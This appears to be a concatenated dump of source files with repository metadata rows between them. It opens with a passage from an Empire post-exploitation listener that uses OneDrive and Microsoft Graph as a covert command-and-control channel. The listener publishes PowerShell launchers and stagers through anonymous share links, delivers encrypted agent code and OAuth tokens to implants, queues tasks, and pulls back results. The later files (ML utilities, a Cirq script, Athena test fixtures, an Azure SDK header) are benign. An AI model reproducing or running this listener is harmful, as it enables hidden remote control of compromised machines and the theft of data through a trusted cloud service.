agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
# Utility functions to handle auth tasks and initial setup
def get_token(client_id, client_secret, code):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'authorization_code',
'scope': 'files.readwrite offline_access',
'code': code,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def renew_token(client_id, client_secret, refresh_token):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
'scope': 'files.readwrite offline_access',
'refresh_token': refresh_token,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def test_token(token):
headers = s.headers.copy()
headers['Authorization'] = 'Bearer ' + token
request = s.get("%s/drive" % base_url, headers=headers)
return request.ok
def setup_folders():
if not (test_token(token['access_token'])):
raise ValueError("Could not set up folders, access token invalid")
base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
if not (base_object.status_code == 200):
print(helpers.color("[*] Creating %s folder" % base_folder))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
else:
message = "[*] {} folder already exists".format(base_folder)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
for item in [staging_folder, taskings_folder, results_folder]:
item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
if not (item_object.status_code == 200):
print(helpers.color("[*] Creating %s/%s folder" % (base_folder, item)))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']),
json=params)
else:
message = "[*] {}/{} already exists".format(base_folder, item)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
def upload_launcher():
ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False,
userAgent='none', proxy='none', proxyCreds='none')
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
data=ps_launcher, headers={"Content-Type": "text/plain"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
def upload_stager():
ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell',
token=token['access_token'])
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
data=ps_stager, headers={"Content-Type": "application/octet-stream"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
# Different domain for some reason?
self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
else:
print(helpers.color("[!] Something went wrong uploading stager"))
message = r.content
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
listener_options = copy.deepcopy(listenerOptions)
listener_name = listener_options['Name']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
client_id = listener_options['ClientID']['Value']
client_secret = listener_options['ClientSecret']['Value']
auth_code = listener_options['AuthCode']['Value']
refresh_token = listener_options['RefreshToken']['Value']
base_folder = listener_options['BaseFolder']['Value']
staging_folder = listener_options['StagingFolder']['Value'].strip('/')
taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
results_folder = listener_options['ResultsFolder']['Value'].strip('/')
redirect_uri = listener_options['RedirectURI']['Value']
base_url = "https://graph.microsoft.com/v1.0"
s = Session()
if refresh_token:
token = renew_token(client_id, client_secret, refresh_token)
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
else:
token = get_token(client_id, client_secret, auth_code)
message = "[*] Got new auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive")
s.headers['Authorization'] = "Bearer " + token['access_token']
setup_folders()
while True:
# Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
try:
if listener_name in list(self.mainMenu.listeners.activeListeners.keys()):
upload_stager()
upload_launcher()
break
else:
time.sleep(1)
except AttributeError:
time.sleep(1)
while True:
time.sleep(int(poll_interval))
try: # Wrap the whole loop in a try/catch so one error won't kill the listener
if time.time() > token['expires_at']: # Get a new token if the current one has expired
token = renew_token(client_id, client_secret, token['refresh_token'])
s.headers['Authorization'] = "Bearer " + token['access_token']
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
upload_stager()
if token['update']:
self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken",
token['refresh_token'])
token['update'] = False
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
for item in search.json()['children']: # Iterate all items in the staging folder
try:
reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
if not reg:
continue
agent_name, stage = reg.groups()
if stage == '1': # Download stage 1, upload stage 2
message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'],
item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(return_val)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=return_val)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
if stage == '3': # Download stage 3, upload stage 4 (full agent code)
message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
agent_token = renew_token(client_id, client_secret, token[
'refresh_token']) # Get auth and refresh tokens for the agent to use
agent_code = str(self.generate_agent(listener_options, client_id, client_secret,
agent_token['access_token'],
agent_token['refresh_token'], redirect_uri, lang))
enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(enc_code)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=enc_code)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
print(helpers.color(
"[!] Could not handle agent staging for listener %s, continuing" % listener_name))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
for agent_id in agent_ids: # Upload any tasks for the current agents
if isinstance(agent_id,bytes):
agent_id = agent_id.decode('UTF-8')
task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key,
update_lastseen=True)
if task_data:
try:
r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id))
if r.status_code == 200: # If there's already something there, download and append the new data
task_data = r.content + task_data
message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data=task_data)
except Exception as e:
message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
for item in search.json()['children']: # For each file in the results folder
try:
agent_id = item['name'].split(".")[0]
for i in range(len(agent_ids)):
agent_ids[i] = agent_ids[i].decode('UTF-8')
if not agent_id in agent_ids: # If we don't recognize that agent, upload a message to restage
print(helpers.color(
"[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name'])))
s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data="RESTAGE")
s.delete("%s/drive/items/%s" % (base_url, item['id']))
continue
try: # Update the agent's last seen time, from the file timestamp
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
except: # sometimes no ms for some reason...
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
seen_time = helpers.utc_to_local(seen_time)
self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
# If the agent is just checking in, the file will only be 1 byte, so no results to fetch
if (item['size'] > 1):
message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.get(item['@microsoft.graph.downloadUrl'])
self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options,
update_lastseen=True)
message = "[*] Deleting {}/{}".format(results_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
except Exception as e:
print(helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e)))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.close()
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill() | 50.252548 | 221 | 0.511054 |
689086857f25a3645162c721f28272a3a37c64a8 | 11,600 | py | Python | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 7 | 2020-08-21T04:04:13.000Z | 2022-03-08T08:00:30.000Z | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 1 | 2020-10-30T04:14:29.000Z | 2020-11-23T18:34:54.000Z | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 1 | 2021-12-23T04:03:15.000Z | 2021-12-23T04:03:15.000Z | # utils.py
import os
import random
import numpy as np
import pandas as pd
from sklearn.metrics import auc, roc_curve, precision_recall_curve
import torch
from torch.autograd import Variable
__author__ = "Yifeng Tao"
def fill_mask(y_trn, m_trn):
y_pos = y_trn.sum(axis=0)
y_neg = ((1 - y_trn) * m_trn).sum(axis=0)
y_add = np.array([[1 if (m_trn[idx,idy] == 0) and (y_pos[idy] > y_neg[idy]) else 0 for idy in range(y_trn.shape[1])] for idx in range(y_trn.shape[0])])
y_trn = y_trn + y_add
m_trn = np.ones(m_trn.shape)
return y_trn, m_trn
def bool_ext(rbool):
""" Solve the problem that raw bool type is always True.
Parameters
----------
rbool: str
should be True of False.
"""
if rbool not in ["True", "False"]:
raise ValueError("Not a valid boolean string")
return rbool == "True"
def bin2idx(omic_bin):
""" Transfer a binarized matrix into a index matrix (for input of embedding layer).
omic_bin: (num_sample, num_feature), each value in {0,1}
omic_idx: 0 is used for padding, and therefore meaningful index starts from 1.
"""
num_max_omic = omic_bin.sum(axis=1).max() # max num of mutation in a single sample
omic_idx = np.zeros( (len(omic_bin), num_max_omic), dtype=int )
for idx, line in enumerate(omic_bin):
line = [idy+1 for idy, val in enumerate(line) if val == 1]
omic_idx[idx][0:len(line)] = line
return omic_idx
def get_ptw_ids(drug_info, tgt, repository):
id2pw = {id:pw for id,pw in zip(drug_info.index,drug_info['Target pathway'])}
if repository == 'gdsc':
#GDCS
pws = [id2pw.get(int(c),'Unknown') for c in tgt.columns]
else:
#CCLE
pws = [id2pw.get(c,'Unknown') for c in tgt.columns]
pw2id = {pw:id for id,pw in enumerate(list(set(pws)))}
ptw_ids = [pw2id[pw] for pw in pws]
return ptw_ids
def load_dataset(input_dir="data/input", repository="gdsc", drug_id=-1, shuffle_feature=False):
""" Load dataset. Samples will be shuffled and all omics data and sensitivity
data will be in the same order of samples.
omics_data: dict
exp_bin, mut_bin, cnv_bin, met_bin, exp_idx, mut_idx, cnv_idx, met_idx
tmr, tgt, msk
"""
assert repository in ['gdsc', 'ccle']
# load sensitivity data and multi-omics data
tgt = pd.read_csv(os.path.join(input_dir,repository+'.csv'), index_col=0)
drug_info = pd.read_csv(os.path.join(input_dir,'drug_info_'+repository+'.csv'), index_col=0)
ptw_ids = get_ptw_ids(drug_info, tgt, repository)
omics_data = {'mut':None, 'cnv':None, 'exp':None, 'met':None}
for omic in omics_data.keys():
omics_data[omic] = pd.read_csv(
os.path.join(input_dir,omic+'_'+repository+'.csv'), index_col=0)
# find samples that have all four types of omics data
# 846 samples for gdsc, 409 samples for ccle
common_samples = [v.index for v in omics_data.values()]
common_samples = list( set(tgt.index).intersection(*common_samples) )
tgt = tgt.loc[common_samples]
for omic in omics_data.keys():
omics_data[omic] = omics_data[omic].loc[common_samples]
tmr = list(tgt.index) # barcodes/names of tumors
msk = tgt.notnull().astype(int).values # mask of target data: 1->data available, 0->nan
tgt = tgt.fillna(0).astype(int).values # fill nan element of target with 0.
num_sample = len(tmr)
rng = []
with open('data/input/rng.txt', 'r') as f:
for line in f:
v = int(line.strip())
if v < num_sample:
rng.append(v)
tmr = [tmr[i] for i in rng]
msk = msk[rng]
tgt = tgt[rng]
omics_data_keys = list(omics_data.keys())
for omic in omics_data_keys:
omic_val = omics_data.pop(omic)
omic_val = omic_val.values
if shuffle_feature:
# shuffle features of each sample (in place)
for l in omic_val:
np.random.shuffle(l)
omics_data[omic+'_bin'] = omic_val
omics_data[omic+'_bin'] = omics_data[omic+'_bin'][rng]
omics_data[omic+'_idx'] = bin2idx(omics_data[omic+'_bin'])
omics_data['tgt'] = tgt
omics_data['msk'] = msk
omics_data['tmr'] = tmr
if drug_id != -1:
omics_data["tgt"] = np.expand_dims(tgt[:,drug_id], axis=1)
omics_data["msk"] = np.expand_dims(msk[:,drug_id], axis=1)
return omics_data, ptw_ids
def load_dataset_autoencoder(input_dir="data/input", repository="gdsc", omic="exp"):
""" Load dataset. Samples will be shuffled and all omics data and sensitivity
data will be in the same order of samples.
omics_data: dict
exp_bin, mut_bin, cnv_bin, met_bin, exp_idx, mut_idx, cnv_idx, met_idx
tmr, tgt, msk
"""
assert repository in ['gdsc', 'ccle']
# load sensitivity data and multi-omics data
omics_data = {omic:None}
for omic in omics_data.keys():
omic_drug = pd.read_csv(
os.path.join(input_dir,omic+'_'+repository+'.csv'), index_col=0)
omic_tcga = pd.read_csv(
os.path.join(input_dir,omic+'_tcga_'+repository+'.csv'), index_col=0)
omics_data[omic] = pd.concat([omic_drug,omic_tcga])
common_samples = [[i for i in v.index] for v in omics_data.values()][0]
tmr = common_samples # barcodes/names of tumors
# shuffle whole dataset, this leads to different results for server or laptop
rng = list(range(len(tmr)))
random.Random(2019).shuffle(rng)
tmr = [tmr[i] for i in rng]
omics_data_keys = list(omics_data.keys())
for omic in omics_data_keys:
omic_val = omics_data.pop(omic)
omics_data[omic+'_bin'] = omic_val.values
omics_data[omic+'_bin'] = omics_data[omic+'_bin'][rng]
omics_data[omic+'_idx'] = bin2idx(omics_data[omic+'_bin'])
omics_data['tmr'] = tmr
return omics_data
def split_dataset(dataset, ratio=0.8):
""" Split the dataset according to the ratio of training/test sets.
Parameters
----------
dataset: dict
dict of lists, including omic profiles, cancer types, sensitivities, sample names
ratio: float
size(train_set)/size(train_set+test_set)
Returns
-------
train_set, test_set: dict
"""
num_sample = len(dataset["tmr"])
num_train_sample = int(num_sample*ratio)
train_set = {k:dataset[k][0:num_train_sample] for k in dataset.keys()}
test_set = {k:dataset[k][num_train_sample:] for k in dataset.keys()}
return train_set, test_set
def get_accuracy(aryx, aryy, mskx, msky):
acc_list = [aryx[i] == aryy[i] for i in range(len(aryx)) if (mskx[i]==1) and (msky[i]==1)]
return np.mean(acc_list)
def get_laplacian_matrix(tgt, msk):
print("Getting Laplacian matrix...")
num_drg = tgt.shape[1]
W = np.zeros((num_drg,num_drg))
for i in range(num_drg):
for j in range(i+1, num_drg):
acc_trn = get_accuracy(tgt[:,i], tgt[:,j], msk[:,i], msk[:,j])
if acc_trn > 0.8:
W[i, j] = 1.0
W[j, i] = 1.0
D = np.diag(np.sum(W, axis=0))
L = D - W
return L
def wrap_dataset_cuda(dataset, use_cuda):
""" Wrap default numpy or list data into PyTorch variables.
"""
batch_dataset = {'tmr':dataset['tmr']}
for k in ['tgt', 'msk']:
if k in dataset.keys():
batch_dataset[k] = Variable(torch.FloatTensor(dataset[k]))
for k in dataset.keys():
if k.endswith('_idx'):
batch_dataset[k] = Variable(torch.LongTensor(dataset[k]))
elif k.endswith('_bin'):
batch_dataset[k] = Variable(torch.FloatTensor(dataset[k]))
if use_cuda:
for k in batch_dataset.keys():
if k == 'tmr':
continue
else:
batch_dataset[k] = batch_dataset[k].cuda()
return batch_dataset
def get_minibatch(dataset, rng, index, batch_size, batch_type="train", use_cuda=True):
""" Get a mini-batch dataset for training or test -- Multi-task/label
learning version here, so we can take drug reponses of a cell lines as
a single sample.
Parameters
----------
dataset: dict
dict of lists, including SGAs, cancer types, DEGs, patient barcodes
rng: list of id_tmr
index: int
starting index of current mini-batch
batch_size: int
batch_type: str
batch strategy is slightly different for training and test
"train": will return to beginning of the queue when `index` out of range
"test": will not return to beginning of the queue when `index` out of range
Returns
-------
batch_dataset: dict
a mini-batch of the input `dataset`.
"""
size_rng = len(rng)
if batch_type == "train":
batch_dataset = {
k : [ dataset[k][rng[i%size_rng]] for i in range(index, index+batch_size) ] \
for k in dataset.keys()}
elif batch_type == "test":
batch_dataset = {
k : [ dataset[k][rng[i]] for i in range(index, min(index+batch_size, size_rng)) ] \
for k in dataset.keys()}
batch_dataset = wrap_dataset_cuda(batch_dataset, use_cuda)
return batch_dataset
def evaluate(labels, msks, preds, epsilon=1e-5):
""" Calculate performance metrics given ground truths and prediction results.
Parameters
----------
labels: matrix of 0/1
ground truth labels
preds: matrix of float in [0,1]
predicted labels
epsilon: float
a small Laplacian smoothing term to avoid zero denominator
Returns
-------
precision: float
recall: float
f1score: float
accuracy: float
"""
if msks is None:
msks = np.ones(labels.shape)
flat_labels = np.reshape(labels,-1)
flat_preds_nr = np.reshape(preds,-1)
flat_preds = np.reshape(np.around(preds),-1)
flat_msks = np.reshape(msks,-1)
flat_labels_msk = np.array([flat_labels[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_msk = np.array([flat_preds[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_nr_msk = np.array([flat_preds_nr[idx] for idx, val in enumerate(flat_msks) if val == 1])
accuracy = np.mean(flat_labels_msk == flat_preds_msk)
true_pos = np.dot(flat_labels_msk, flat_preds_msk)
precision = 1.0*true_pos/(flat_preds_msk.sum()+epsilon)
recall = 1.0*true_pos/(flat_labels_msk.sum()+epsilon)
f1score = 2*precision*recall/(precision+recall+epsilon)
# a bug fixed
fpr, tpr, _ = roc_curve(flat_labels_msk, flat_preds_nr_msk)
auc_val = auc(fpr, tpr)
return precision, recall, f1score, accuracy, auc_val
def evaluate_all(labels, msks, preds, epsilon=1e-5):
""" Calculate performance metrics given ground truths and prediction results.
Parameters
----------
labels: matrix of 0/1
ground truth labels
preds: matrix of float in [0,1]
predicted labels
epsilon: float
a small Laplacian smoothing term to avoid zero denominator
Returns
-------
precision: float
recall: float
f1score: float
accuracy: float
"""
if msks is None:
msks = np.ones(labels.shape)
flat_labels = np.reshape(labels,-1)
flat_preds_nr = np.reshape(preds,-1)
flat_preds = np.reshape(np.around(preds),-1)
flat_msks = np.reshape(msks,-1)
flat_labels_msk = np.array([flat_labels[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_msk = np.array([flat_preds[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_nr_msk = np.array([flat_preds_nr[idx] for idx, val in enumerate(flat_msks) if val == 1])
accuracy = np.mean(flat_labels_msk == flat_preds_msk)
true_pos = np.dot(flat_labels_msk, flat_preds_msk)
precision = 1.0*true_pos/(flat_preds_msk.sum()+epsilon)
recall = 1.0*true_pos/(flat_labels_msk.sum()+epsilon)
f1score = 2*precision*recall/(precision+recall+epsilon)
# a bug fixed
fpr, tpr, _ = roc_curve(flat_labels_msk, flat_preds_nr_msk)
auc_roc_val = auc(fpr, tpr)
precision_list, recall_list, _ = precision_recall_curve(flat_labels_msk, flat_preds_nr_msk)
auc_pr_val = auc(recall_list, precision_list)
return precision, recall, f1score, accuracy, auc_roc_val, auc_pr_val
| 28.501229 | 153 | 0.6825 |
043964834e0e65f29bcc42ca627921a57ef7f305 | 1,749 | py | Python | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=9
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=6
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=7
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=8
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
circuit = circuit.with_noise(cirq.depolarize(p=0.01))
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_noisy39.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | 29.15 | 77 | 0.691824 |
aef51ba03a3c750c47f957f93756187a93e12a7b | 3,260 | py | Python | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 7 | 2020-04-03T19:40:35.000Z | 2022-01-03T17:28:58.000Z | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 1 | 2022-01-05T13:29:18.000Z | 2022-01-05T13:29:18.000Z | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 1 | 2020-10-23T11:31:54.000Z | 2020-10-23T11:31:54.000Z | # Copyright 2020 Akamai Technologies, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import secrets
from urllib.parse import urlsplit
import boto3
import pytest
from pallas.assembly import EnvironConfig
config = EnvironConfig(prefix="TEST_PALLAS")
@pytest.fixture(name="region", scope="session")
def region_fixture():
# Do not raise or skip tests if region is not defined.
# Region can be defined in ~/.aws/config.
return config.get_str("REGION")
@pytest.fixture(name="database", scope="session")
def database_fixture():
"""
Athena database.
Tests depending on this fixture are skipped
if the PALLAS_TEST_ATHENA_DATABASE environment variable is not defined.
"""
database = config.get_str("DATABASE")
if not database:
pytest.skip(f"{config.key('DATABASE')} not defined.")
return database
@pytest.fixture(name="workgroup", scope="session")
def workgroup_fixture():
"""
Athena workgroup.
"""
return config.get_str("WORKGROUP")
def _s3_recursive_delete(uri):
scheme, netloc, path, query, fragment = urlsplit(uri)
assert scheme == "s3"
assert query == fragment == ""
if path and not path.endswith("/"):
path += "/"
bucket = boto3.resource("s3").Bucket(netloc)
for item in bucket.objects.filter(Prefix=path):
item.delete()
@pytest.fixture(name="session_output_location", scope="session")
def session_output_location_fixture():
"""
Base URI of a temporary S3 locations.
Performs cleanup at the end of the test session.
Tests depending on this fixture are skipped
if the PALLAS_TEST_S3_TMP environment variable is not defined.
"""
base_output_location = config.get_str("OUTPUT_LOCATION")
if not base_output_location:
pytest.skip(f"{config.key('OUTPUT_LOCATION')} not defined.")
if base_output_location and not base_output_location.endswith("/"):
base_output_location += "/"
token = secrets.token_hex(4) # Unique path allows parallel test runs.
session_output_location = base_output_location + f"test-pallas-{token}"
yield session_output_location
_s3_recursive_delete(session_output_location)
@pytest.fixture(name="output_location")
def output_location_fixture(session_output_location):
"""
URI of a temporary S3 location than can be used for testing.
A unique URI is generated for each test.
Cleanup is performed at once at the end of the test session.
Tests depending on this fixture are skipped
if the PALLAS_TEST_S3_TMP environment variable is not defined.
"""
if session_output_location and not session_output_location.endswith("/"):
session_output_location += "/"
return session_output_location + secrets.token_hex(8)
| 32.277228 | 77 | 0.724847 |
39cb9e79a094748f59916127acc97b45cc62ec6e | 2,066 | py | Python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
